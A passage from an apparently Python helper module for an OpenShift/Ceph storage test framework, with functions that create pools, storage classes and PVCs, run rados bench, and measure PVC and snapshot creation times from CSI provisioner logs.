cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
encryption_kms_id (str): ID of the KMS entry from connection details
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(constants.CSI_RBD_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(constants.CSI_CEPHFS_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["csi.storage.k8s.io/provisioner-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/provisioner-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-name"
] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
burst (bool): True for bulk creation, False ( default) for multiple creation
Returns:
ocs_objs (list): List of PVC objects
tmpdir (str): The full path of the directory in which the yamls for pvc objects creation reside
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
# Creating tem directory to hold the files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Letting the system 1 sec for each PVC to create.
# this will prevent any other command from running in the system in this
# period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"until starting verify that PVCs was created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
pv_names_list (str): List of pv objects to be deleted
"""
oc = OCP(kind="pod", namespace=defaults.ROOK_CLUSTER_NAMESPACE)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: If the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
logger.info(
f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
f", checkging if it is kind={constants.CEPHFILESYSTEM}"
)
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info("Filesystem %s was not create at Openshift Side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
namespace (str) the namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
object_list (array): Array of OCS objects.
Returns:
(array): Array of OCS objects without removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""" "
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
logging.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
A task for radosbench. Runs radosbench command on specified pod . If
parameters are not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows to create a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_snapshot_time(interface, snap_name, status):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
The time and date extraction code below has been modified to read
the month and day data in the logs. This fixes an error where negative
time values are calculated when test runs cross midnight. Also, previous
calculations would not set the year, and so the calculations were done
as if the year were 1900. This is not a problem except that 1900 was
not a leap year and so the next February 29th would throw ValueErrors
for the whole day. To avoid this problem, changes were made to also
include the current year.
Incorrect times will still be given for tests that cross over from
December 31 to January 1.
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
def get_pattern_time(log, snapname, pattern):
"""
Get the time of pattern in the log
Args:
log (list): list of all lines in the log file
snapname (str): the name of the snapshot
pattern (str): the pattern that need to be found in the log (start / bound)
Returns:
str: string of the pattern timestamp in the log, if not found None
"""
this_year = str(datetime.datetime.now().year)
for line in log:
if re.search(snapname, line) and re.search(pattern, line):
mon_day = " ".join(line.split(" ")[0:2])
return f"{this_year} {mon_day}"
return None
logs = ""
# the starting and ending time are taken from different logs,
# the start creation time is taken from the snapshot controller, while
# the end creation time is taken from the csi snapshot driver
if status.lower() == "start":
pattern = "Creating content for snapshot"
# Get the snapshoter-controller pod
pod_name = pod.get_csi_snapshoter_pod()
logs = pod.get_pod_logs(
pod_name, namespace="openshift-cluster-storage-operator"
)
elif status.lower() == "end":
pattern = "readyToUse true"
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
else:
logger.error(f"the status {status} is invalid.")
return None
logs = logs.split("\n")
stat = None
# Extract the time for the one PVC snapshot provisioning
if isinstance(snap_name, str):
stat = get_pattern_time(logs, snap_name, pattern)
# Extract the time for the list of PVCs snapshot provisioning
if isinstance(snap_name, list):
all_stats = []
for snapname in snap_name:
all_stats.append(get_pattern_time(logs, snapname.name, pattern))
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
if stat:
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
else:
return None
def measure_snapshot_creation_time(interface, snap_name, snap_con_name, snap_uid=None):
"""
Measure Snapshot creation time based on logs
Args:
snap_name (str): Name of the snapshot for creation time measurement
Returns:
float: Creation time for the snapshot
"""
start = get_snapshot_time(interface, snap_name, status="start")
end = get_snapshot_time(interface, snap_con_name, status="end")
logs = ""
if start and end:
total = end - start
return total.total_seconds()
else:
# at 4.8 the log messages was changed, so need different parsing
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
for log_pod in pod_name:
logger.info(f"Read logs from {log_pod}")
logs += pod.get_pod_logs(log_pod, "csi-snapshotter")
logs = logs.split("\n")
pattern = "CSI CreateSnapshot: snapshot-"
for line in logs:
if (
re.search(snap_uid, line)
and re.search(pattern, line)
and re.search("readyToUse \\[true\\]", line)
):
# The creation time log is in nanosecond, so, it need to convert to seconds.
results = int(line.split()[-5].split(":")[1].replace("]", "")) * (
10 ** -9
)
return float(f"{results:.3f}")
return None
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
# Clear and get CSI logs after 60secs
logging.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logging.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
return_log_times (bool): Determines the return value -- if False, dictionary of pv_names with the deletion time
is returned; if True -- the dictionary of pv_names with the tuple of (srart_deletion_time,
end_deletion_time) is returned
Returns:
pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
return_log_times argument value and are either the corresponding deletion times (when return_log_times
is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
